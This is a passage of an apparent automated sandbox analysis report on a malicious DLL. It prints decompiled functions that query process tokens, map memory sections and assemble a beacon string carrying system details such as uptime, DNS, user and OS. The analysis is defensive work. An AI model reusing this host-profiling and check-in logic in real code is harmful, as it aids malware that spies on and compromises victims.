                    • WaitForSingleObject.KERNEL32(00000000,000000FF,10001EA8,?,00000000), ref: 1000117E
                    • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 10001190
                    • CloseHandle.KERNEL32(00000000), ref: 10001197
                    • GetLastError.KERNEL32(10001EA8,?,00000000), ref: 1000119F
                    • GetLastError.KERNEL32 ref: 100011AC
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                    • String ID:
                    • API String ID: 3479304935-0
                    • Opcode ID: 4013a9184cb7c1bc6bee1f3c097bfa70eb0927f871e735c9adcd4eb2677f4e65
                    • Instruction ID: 136ff7606eb524f18d1a387e18ea9bd855513c6b7b8d73c4c634e1d572feb9be
                    • Opcode Fuzzy Hash: 4013a9184cb7c1bc6bee1f3c097bfa70eb0927f871e735c9adcd4eb2677f4e65
                    • Instruction Fuzzy Hash: 90319C7590162AEBF711DBA58C94ADF7BEDEF446D0F214126FA04E3248DB30DA408BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 38%
                    			E010C77BB(char _a4, void* _a8) {
                    				void* _v8;
                    				void* _v12;
                    				char _v16;
                    				void* _v20;
                    				char _v24;
                    				char _v28;
                    				char _v32;
                    				char _v36;
                    				char _v40;
                    				void* _v44;
                    				void** _t33;
                    				void* _t40;
                    				void* _t43;
                    				void** _t44;
                    				intOrPtr* _t47;
                    				char _t48;
                    
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_v20 = _a4;
                    				_t48 = 0;
                    				_v16 = 0;
                    				_a4 = 0;
                    				_v44 = 0x18;
                    				_v40 = 0;
                    				_v32 = 0;
                    				_v36 = 0;
                    				_v28 = 0;
                    				_v24 = 0;
                    				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                    					_t33 =  &_v8;
                    					__imp__(_v12, 8, _t33);
                    					if(_t33 >= 0) {
                    						_t47 = __imp__;
                    						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                    						_t44 = E010C63FD(_a4);
                    						if(_t44 != 0) {
                    							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                    							if(_t40 >= 0) {
                    								memcpy(_a8,  *_t44, 0x1c);
                    								_t48 = 1;
                    							}
                    							E010C17AB(_t44);
                    						}
                    						NtClose(_v8); // executed
                    					}
                    					NtClose(_v12);
                    				}
                    				return _t48;
                    			}

                    APIs
                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 010C7802
                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 010C7815
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 010C7831
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 010C784E
                    • memcpy.NTDLL(?,00000000,0000001C), ref: 010C785B
                    • NtClose.NTDLL(?), ref: 010C786D
                    • NtClose.NTDLL(00000000), ref: 010C7877
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 2575439697-0
                    • Opcode ID: c4ce68e5dbc8a8b46a950838ec2ab9b20aa51883ba8e90bc80d3536633a69d72
                    • Instruction ID: b7860afa87758f42108c0c498e9be6e2d42f9c0c64d743ff2be0e014f33954c9
                    • Opcode Fuzzy Hash: c4ce68e5dbc8a8b46a950838ec2ab9b20aa51883ba8e90bc80d3536633a69d72
                    • Instruction Fuzzy Hash: 942103B2900219BFDB119F95CC85ADEBFBDEF08B40F10406AFA45A6210D7728A44DFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E10001F61(intOrPtr* __eax, void** _a4) {
                    				int _v12;
                    				void* _v16;
                    				void* _v20;
                    				void* _v24;
                    				int _v28;
                    				int _v32;
                    				intOrPtr _v36;
                    				int _v40;
                    				int _v44;
                    				void* _v48;
                    				void* __esi;
                    				long _t34;
                    				void* _t39;
                    				void* _t47;
                    				intOrPtr* _t48;
                    
                    				_t48 = __eax;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_v24 =  *((intOrPtr*)(__eax + 4));
                    				_v16 = 0;
                    				_v12 = 0;
                    				_v48 = 0x18;
                    				_v44 = 0;
                    				_v36 = 0x40;
                    				_v40 = 0;
                    				_v32 = 0;
                    				_v28 = 0;
                    				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                    				if(_t34 < 0) {
                    					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                    				} else {
                    					 *_t48 = _v16;
                    					_t39 = E100012BE(_t48,  &_v12); // executed
                    					_t47 = _t39;
                    					if(_t47 != 0) {
                    						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                    					} else {
                    						memset(_v12, 0, _v24);
                    						 *_a4 = _v12;
                    					}
                    				}
                    				return _t47;
                    			}

                    APIs
                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 10001FBE
                      • Part of subcall function 100012BE: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001FD3,00000002,00000000,?,?,00000000,?,?,10001FD3,00000002), ref: 100012EB
                    • memset.NTDLL ref: 10001FE0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: Section$CreateViewmemset
                    • String ID: @
                    • API String ID: 2533685722-2766056989
                    • Opcode ID: 97125f7fc7b543a1a6761c50e715df49521db9375fc44024afda9e762102f593
                    • Instruction ID: 7011bbd483f2ac9fc56361f1e6937c6e52c657097d993af70c3397b369731c67
                    • Opcode Fuzzy Hash: 97125f7fc7b543a1a6761c50e715df49521db9375fc44024afda9e762102f593
                    • Instruction Fuzzy Hash: 5F2108B6D00209AFDB11CFA9C884ADEFBB9EF48354F108429E615F3210D730AA458BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E100012BE(void** __esi, PVOID* _a4) {
                    				long _v8;
                    				void* _v12;
                    				void* _v16;
                    				long _t13;
                    
                    				_v16 = 0;
                    				asm("stosd");
                    				_v8 = 0;
                    				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                    				if(_t13 < 0) {
                    					_push(_t13);
                    					return __esi[6]();
                    				}
                    				return 0;
                    			}

                    APIs
                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001FD3,00000002,00000000,?,?,00000000,?,?,10001FD3,00000002), ref: 100012EB
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: SectionView
                    • String ID:
                    • API String ID: 1323581903-0
                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                    • Instruction ID: aefe625517b6fb83a219c38b084ca840f45519f0753eeb6c84f01f9ec1e36c5b
                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                    • Instruction Fuzzy Hash: 23F01CB690420CBFEB119FA5CC85C9FBBBDEB48294F104939B552E2094D6309E199A60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E010C68EB(long __eax, void* __edx, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
                    				intOrPtr _v0;
                    				intOrPtr _v4;
                    				void* _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v52;
                    				void* __ecx;
                    				void* __edi;
                    				long _t29;
                    				intOrPtr _t30;
                    				intOrPtr _t31;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr _t34;
                    				void* _t37;
                    				intOrPtr _t38;
                    				int _t41;
                    				void* _t42;
                    				intOrPtr _t46;
                    				intOrPtr _t47;
                    				void* _t50;
                    				intOrPtr _t54;
                    				intOrPtr _t58;
                    				intOrPtr* _t60;
                    				void* _t61;
                    				intOrPtr _t66;
                    				intOrPtr _t72;
                    				intOrPtr _t75;
                    				intOrPtr _t78;
                    				int _t81;
                    				intOrPtr _t82;
                    				int _t85;
                    				intOrPtr _t87;
                    				int _t90;
                    				intOrPtr _t92;
                    				int _t95;
                    				intOrPtr* _t97;
                    				intOrPtr* _t98;
                    				void* _t99;
                    				void* _t103;
                    				void* _t104;
                    				void* _t105;
                    				intOrPtr _t106;
                    				void* _t108;
                    				int _t109;
                    				void* _t110;
                    				void* _t111;
                    				void* _t113;
                    				void* _t114;
                    				void* _t116;
                    
                    				_t103 = __edx;
                    				_t29 = __eax;
                    				_t113 = _a20;
                    				_v4 = 8;
                    				if(__eax == 0) {
                    					_t29 = GetTickCount();
                    				}
                    				_t30 =  *0x10ca018; // 0x3639fe1b
                    				asm("bswap eax");
                    				_t31 =  *0x10ca014; // 0x3a87c8cd
                    				asm("bswap eax");
                    				_t32 =  *0x10ca010; // 0xd8d2f808
                    				asm("bswap eax");
                    				_t33 =  *0x10ca00c; // 0xeec43f25
                    				asm("bswap eax");
                    				_t34 =  *0x10ca320; // 0x26dd5a8
                    				_t3 = _t34 + 0x10cb633; // 0x74666f73
                    				_t109 = wsprintfA(_t113, _t3, 2, 0x3d170, _t33, _t32, _t31, _t30,  *0x10ca02c,  *0x10ca004, _t29);
                    				_t37 = E010C4B2C();
                    				_t38 =  *0x10ca320; // 0x26dd5a8
                    				_t4 = _t38 + 0x10cb673; // 0x74707526
                    				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
                    				_t116 = _t114 + 0x38;
                    				_t110 = _t109 + _t41;
                    				if(_a24 != 0) {
                    					_t92 =  *0x10ca320; // 0x26dd5a8
                    					_t8 = _t92 + 0x10cb67e; // 0x732526
                    					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t95; // executed
                    				}
                    				_t42 = E010C256F(_t99); // executed
                    				_t104 = _t42;
                    				if(_t104 != 0) {
                    					_t87 =  *0x10ca320; // 0x26dd5a8
                    					_t10 = _t87 + 0x10cb8d4; // 0x736e6426
                    					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t90;
                    					HeapFree( *0x10ca2d8, 0, _t104);
                    				}
                    				_t105 = E010C4B71();
                    				if(_t105 != 0) {
                    					_t82 =  *0x10ca320; // 0x26dd5a8
                    					_t12 = _t82 + 0x10cb8dc; // 0x6f687726
                    					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t85;
                    					HeapFree( *0x10ca2d8, 0, _t105);
                    				}
                    				_t106 =  *0x10ca3cc; // 0x37a95b0
                    				_a24 = E010C7729(0x10ca00a, _t106 + 4);
                    				_t46 =  *0x10ca36c; // 0x0
                    				if(_t46 != 0) {
                    					_t78 =  *0x10ca320; // 0x26dd5a8
                    					_t15 = _t78 + 0x10cb8b6; // 0x3d736f26
                    					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t81;
                    				}
                    				_t47 =  *0x10ca368; // 0x0
                    				if(_t47 != 0) {
                    					_t75 =  *0x10ca320; // 0x26dd5a8
                    					_t17 = _t75 + 0x10cb88d; // 0x3d706926
                    					wsprintfA(_t110 + _t113, _t17, _t47);
                    				}
                    				if(_a24 != 0) {
                    					_t50 = RtlAllocateHeap( *0x10ca2d8, 0, 0x800); // executed
                    					_t108 = _t50;
                    					if(_t108 != 0) {
                    						E010C53EC(GetTickCount());
                    						_t54 =  *0x10ca3cc; // 0x37a95b0
                    						__imp__(_t54 + 0x40);
                    						asm("lock xadd [eax], ecx");
                    						_t58 =  *0x10ca3cc; // 0x37a95b0
                    						__imp__(_t58 + 0x40);
                    						_t60 =  *0x10ca3cc; // 0x37a95b0
                    						_t61 = E010C18BA(1, _t103, _t113,  *_t60); // executed
                    						_t111 = _t61;
                    						asm("lock xadd [eax], ecx");
                    						if(_t111 != 0) {
                    							StrTrimA(_t111, 0x10c928c);
                    							_push(_t111);
                    							_t66 = E010C252A();
                    							_a12 = _t66;
                    							if(_t66 != 0) {
                    								_t97 = __imp__;
                    								 *_t97(_t111, _v0);
                    								 *_t97(_t108, _v4);
                    								_t98 = __imp__;
                    								 *_t98(_t108, _v0);
                    								 *_t98(_t108, _t111);
                    								_t72 = E010C1AA2(0xffffffffffffffff, _t108, _v24, _v20); // executed
                    								_v52 = _t72;
                    								if(_t72 != 0 && _t72 != 0x10d2) {
                    									E010C5F6A();
                    								}
                    								HeapFree( *0x10ca2d8, 0, _v16);
                    							}
                    							HeapFree( *0x10ca2d8, 0, _t111);
                    						}
                    						RtlFreeHeap( *0x10ca2d8, 0, _t108); // executed
                    					}
                    					HeapFree( *0x10ca2d8, 0, _a16);
                    				}
                    				HeapFree( *0x10ca2d8, 0, _t113);
                    				return _a12;
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 010C6901
                    • wsprintfA.USER32 ref: 010C694E
                    • wsprintfA.USER32 ref: 010C696B
                    • wsprintfA.USER32 ref: 010C698D
                    • wsprintfA.USER32 ref: 010C69B0
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C69C0
                    • wsprintfA.USER32 ref: 010C69E2
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C69F2
                    • wsprintfA.USER32 ref: 010C6A29
                    • wsprintfA.USER32 ref: 010C6A49
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010C6A66
                    • GetTickCount.KERNEL32 ref: 010C6A76
                    • RtlEnterCriticalSection.NTDLL(037A9570), ref: 010C6A8A
                    • RtlLeaveCriticalSection.NTDLL(037A9570), ref: 010C6AA8
                      • Part of subcall function 010C18BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,010C6ABB,?,037A95B0), ref: 010C18E5
                      • Part of subcall function 010C18BA: lstrlen.KERNEL32(?,?,?,010C6ABB,?,037A95B0), ref: 010C18ED
                      • Part of subcall function 010C18BA: strcpy.NTDLL ref: 010C1904
                      • Part of subcall function 010C18BA: lstrcat.KERNEL32(00000000,?), ref: 010C190F
                      • Part of subcall function 010C18BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,010C6ABB,?,037A95B0), ref: 010C192C
                    • StrTrimA.SHLWAPI(00000000,010C928C,?,037A95B0), ref: 010C6ADA
                      • Part of subcall function 010C252A: lstrlen.KERNEL32(037A9B50,00000000,00000000,7691C740,010C6AE6,00000000), ref: 010C253A
                      • Part of subcall function 010C252A: lstrlen.KERNEL32(?), ref: 010C2542
                      • Part of subcall function 010C252A: lstrcpy.KERNEL32(00000000,037A9B50), ref: 010C2556
                      • Part of subcall function 010C252A: lstrcat.KERNEL32(00000000,?), ref: 010C2561
                    • lstrcpy.KERNEL32(00000000,?), ref: 010C6AF9
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 010C6B00
                    • lstrcat.KERNEL32(00000000,?), ref: 010C6B0D
                    • lstrcat.KERNEL32(00000000,00000000), ref: 010C6B11
                      • Part of subcall function 010C1AA2: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 010C1B54
                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 010C6B41
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 010C6B50
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,037A95B0), ref: 010C6B5F
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C6B71
                    • HeapFree.KERNEL32(00000000,?), ref: 010C6B80
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                    • String ID: Ut
                    • API String ID: 1892477351-8415677
                    • Opcode ID: 5a706b15e34a9538cbb03840c69e391a72484d13af183b590494feb0cf1c1e00
                    • Instruction ID: e57821593d2bc3ce64575e079d5717cdc59fc21b019f72ff318f3450b31ee7e3
                    • Opcode Fuzzy Hash: 5a706b15e34a9538cbb03840c69e391a72484d13af183b590494feb0cf1c1e00
                    • Instruction Fuzzy Hash: 59719B71600219EFD7219B68DC48F9A3BE8FB48754F144228F9C9D3255EA3EE809DF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 75%
                    			E010C2FC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
                    				signed int _v8;
                    				void* _v12;
                    				void* _v16;
                    				void* _v20;
                    				void* _v24;
                    				void* __ebx;
                    				void* __edi;
                    				long _t63;
                    				intOrPtr _t64;
                    				intOrPtr _t65;
                    				intOrPtr _t66;
                    				intOrPtr _t67;
                    				intOrPtr _t68;
                    				void* _t71;
                    				intOrPtr _t72;
                    				int _t75;
                    				void* _t76;
                    				void* _t77;
                    				void* _t79;
                    				void* _t82;
                    				intOrPtr _t86;
                    				intOrPtr _t90;
                    				intOrPtr* _t92;
                    				void* _t93;
                    				void* _t98;
                    				intOrPtr _t104;
                    				signed int _t108;
                    				char** _t110;
                    				int _t113;
                    				signed int _t115;
                    				intOrPtr* _t116;
                    				intOrPtr* _t118;
                    				intOrPtr* _t120;
                    				intOrPtr* _t122;
                    				intOrPtr _t125;
                    				intOrPtr _t130;
                    				int _t134;
                    				intOrPtr _t136;
                    				int _t139;
                    				CHAR* _t140;
                    				intOrPtr _t141;
                    				void* _t142;
                    				void* _t151;
                    				int _t152;
                    				void* _t153;
                    				intOrPtr _t154;
                    				void* _t156;
                    				long _t160;
                    				intOrPtr* _t161;
                    				intOrPtr* _t162;
                    				intOrPtr* _t165;
                    				void* _t166;
                    				void* _t168;
                    
                    				_t151 = __edx;
                    				_t142 = __ecx;
                    				_t63 = __eax;
                    				_v8 = 8;
                    				if(__eax == 0) {
                    					_t63 = GetTickCount();
                    				}
                    				_t64 =  *0x10ca018; // 0x3639fe1b
                    				asm("bswap eax");
                    				_t65 =  *0x10ca014; // 0x3a87c8cd
                    				_t140 = _a20;
                    				asm("bswap eax");
                    				_t66 =  *0x10ca010; // 0xd8d2f808
                    				asm("bswap eax");
                    				_t67 =  *0x10ca00c; // 0xeec43f25
                    				asm("bswap eax");
                    				_t68 =  *0x10ca320; // 0x26dd5a8
                    				_t3 = _t68 + 0x10cb633; // 0x74666f73
                    				_t152 = wsprintfA(_t140, _t3, 3, 0x3d170, _t67, _t66, _t65, _t64,  *0x10ca02c,  *0x10ca004, _t63);
                    				_t71 = E010C4B2C();
                    				_t72 =  *0x10ca320; // 0x26dd5a8
                    				_t4 = _t72 + 0x10cb673; // 0x74707526
                    				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
                    				_t168 = _t166 + 0x38;
                    				_t153 = _t152 + _t75;
                    				if(_a8 != 0) {
                    					_t136 =  *0x10ca320; // 0x26dd5a8
                    					_t8 = _t136 + 0x10cb67e; // 0x732526
                    					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
                    					_t168 = _t168 + 0xc;
                    					_t153 = _t153 + _t139; // executed
                    				}
                    				_t76 = E010C256F(_t142); // executed
                    				_t141 = __imp__; // 0x74e05520
                    				_a8 = _t76;
                    				if(_t76 != 0) {
                    					_t130 =  *0x10ca320; // 0x26dd5a8
                    					_t11 = _t130 + 0x10cb8d4; // 0x736e6426
                    					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
                    					_t168 = _t168 + 0xc;
                    					_t153 = _t153 + _t134;
                    					HeapFree( *0x10ca2d8, 0, _a8);
                    				}
                    				_t77 = E010C4B71();
                    				_a8 = _t77;
                    				if(_t77 != 0) {
                    					_t125 =  *0x10ca320; // 0x26dd5a8
                    					_t15 = _t125 + 0x10cb8dc; // 0x6f687726
                    					wsprintfA(_t153 + _a20, _t15, _t77);
                    					_t168 = _t168 + 0xc;
                    					HeapFree( *0x10ca2d8, 0, _a8);
                    				}
                    				_t154 =  *0x10ca3cc; // 0x37a95b0
                    				_t79 = E010C7729(0x10ca00a, _t154 + 4);
                    				_t160 = 0;
                    				_v16 = _t79;
                    				if(_t79 == 0) {
                    					L28:
                    					RtlFreeHeap( *0x10ca2d8, _t160, _a20); // executed
                    					return _v8;
                    				} else {
                    					_t82 = RtlAllocateHeap( *0x10ca2d8, 0, 0x800);
                    					_a8 = _t82;
                    					if(_t82 == 0) {
                    						L27:
                    						HeapFree( *0x10ca2d8, _t160, _v16);
                    						goto L28;
                    					}
                    					E010C53EC(GetTickCount());
                    					_t86 =  *0x10ca3cc; // 0x37a95b0
                    					__imp__(_t86 + 0x40);
                    					asm("lock xadd [eax], ecx");
                    					_t90 =  *0x10ca3cc; // 0x37a95b0
                    					__imp__(_t90 + 0x40);
                    					_t92 =  *0x10ca3cc; // 0x37a95b0
                    					_t93 = E010C18BA(1, _t151, _a20,  *_t92); // executed
                    					_t156 = _t93;
                    					_v24 = _t156;
                    					asm("lock xadd [eax], ecx");
                    					if(_t156 == 0) {
                    						L26:
                    						RtlFreeHeap( *0x10ca2d8, _t160, _a8); // executed
                    						goto L27;
                    					}
                    					StrTrimA(_t156, 0x10c928c);
                    					_push(_t156);
                    					_t98 = E010C252A();
                    					_v12 = _t98;
                    					if(_t98 == 0) {
                    						L25:
                    						HeapFree( *0x10ca2d8, _t160, _t156);
                    						goto L26;
                    					}
                    					_t161 = __imp__;
                    					 *_t161(_t156, _a4);
                    					 *_t161(_a8, _v16);
                    					_t162 = __imp__;
                    					 *_t162(_a8, _v12);
                    					_t104 = E010C5406( *_t162(_a8, _t156), _a8);
                    					_a4 = _t104;
                    					if(_t104 == 0) {
                    						_v8 = 8;
                    						L23:
                    						E010C5F6A();
                    						L24:
                    						HeapFree( *0x10ca2d8, 0, _v12);
                    						_t160 = 0;
                    						goto L25;
                    					}
                    					_t108 = E010C22C7(_t141, 0xffffffffffffffff, _t156,  &_v20); // executed
                    					_v8 = _t108;
                    					if(_t108 == 0) {
                    						_t165 = _v20;
                    						_t115 = E010C1E51(_t165, _a4, _a12, _a16); // executed
                    						_v8 = _t115;
                    						_t116 =  *((intOrPtr*)(_t165 + 8));
                    						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                    						_t118 =  *((intOrPtr*)(_t165 + 8));
                    						 *((intOrPtr*)( *_t118 + 8))(_t118);
                    						_t120 =  *((intOrPtr*)(_t165 + 4));
                    						 *((intOrPtr*)( *_t120 + 8))(_t120);
                    						_t122 =  *_t165;
                    						 *((intOrPtr*)( *_t122 + 8))(_t122);
                    						E010C17AB(_t165);
                    					}
                    					if(_v8 != 0x10d2) {
                    						L18:
                    						if(_v8 == 0) {
                    							_t110 = _a12;
                    							if(_t110 != 0) {
                    								_t157 =  *_t110;
                    								_t163 =  *_a16;
                    								wcstombs( *_t110,  *_t110,  *_a16);
                    								_t113 = E010C5D6F(_t157, _t157, _t163 >> 1);
                    								_t156 = _v24;
                    								 *_a16 = _t113;
                    							}
                    						}
                    						goto L21;
                    					} else {
                    						if(_a12 != 0) {
                    							L21:
                    							E010C17AB(_a4);
                    							if(_v8 == 0 || _v8 == 0x10d2) {
                    								goto L24;
                    							} else {
                    								goto L23;
                    							}
                    						}
                    						_v8 = _v8 & 0x00000000;
                    						goto L18;
                    					}
                    				}
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 010C2FD8
                    • wsprintfA.USER32 ref: 010C3028
                    • wsprintfA.USER32 ref: 010C3045
                    • wsprintfA.USER32 ref: 010C3065
                    • wsprintfA.USER32 ref: 010C3091
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C30A3
                    • wsprintfA.USER32 ref: 010C30C4
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C30D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010C3102
                    • GetTickCount.KERNEL32 ref: 010C3113
                    • RtlEnterCriticalSection.NTDLL(037A9570), ref: 010C3127
                    • RtlLeaveCriticalSection.NTDLL(037A9570), ref: 010C3145
                      • Part of subcall function 010C18BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,010C6ABB,?,037A95B0), ref: 010C18E5
                      • Part of subcall function 010C18BA: lstrlen.KERNEL32(?,?,?,010C6ABB,?,037A95B0), ref: 010C18ED
                      • Part of subcall function 010C18BA: strcpy.NTDLL ref: 010C1904
                      • Part of subcall function 010C18BA: lstrcat.KERNEL32(00000000,?), ref: 010C190F
                      • Part of subcall function 010C18BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,010C6ABB,?,037A95B0), ref: 010C192C
                    • StrTrimA.SHLWAPI(00000000,010C928C,?,037A95B0), ref: 010C317C
                      • Part of subcall function 010C252A: lstrlen.KERNEL32(037A9B50,00000000,00000000,7691C740,010C6AE6,00000000), ref: 010C253A
                      • Part of subcall function 010C252A: lstrlen.KERNEL32(?), ref: 010C2542
                      • Part of subcall function 010C252A: lstrcpy.KERNEL32(00000000,037A9B50), ref: 010C2556
                      • Part of subcall function 010C252A: lstrcat.KERNEL32(00000000,?), ref: 010C2561
                    • lstrcpy.KERNEL32(00000000,?), ref: 010C319D
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 010C31A5
                    • lstrcat.KERNEL32(00000000,?), ref: 010C31B3
                    • lstrcat.KERNEL32(00000000,00000000), ref: 010C31B9
                      • Part of subcall function 010C5406: lstrlen.KERNEL32(?,00000000,037A9D58,00000000,010C3C77,037A9F7B,69B25F44,?,?,?,?,69B25F44,00000005,010CA00C,4D283A53,?), ref: 010C540D
                      • Part of subcall function 010C5406: mbstowcs.NTDLL ref: 010C5436
                      • Part of subcall function 010C5406: memset.NTDLL ref: 010C5448
                    • wcstombs.NTDLL ref: 010C324A
                      • Part of subcall function 010C1E51: SysAllocString.OLEAUT32(?), ref: 010C1E92
                      • Part of subcall function 010C1E51: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 010C1F14
                      • Part of subcall function 010C1E51: StrStrIW.SHLWAPI(?,006E0069), ref: 010C1F53
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    • HeapFree.KERNEL32(00000000,?,00000000), ref: 010C328B
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 010C3297
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,037A95B0), ref: 010C32A3
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C32AF
                    • RtlFreeHeap.NTDLL(00000000,?), ref: 010C32BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                    • String ID: Ut
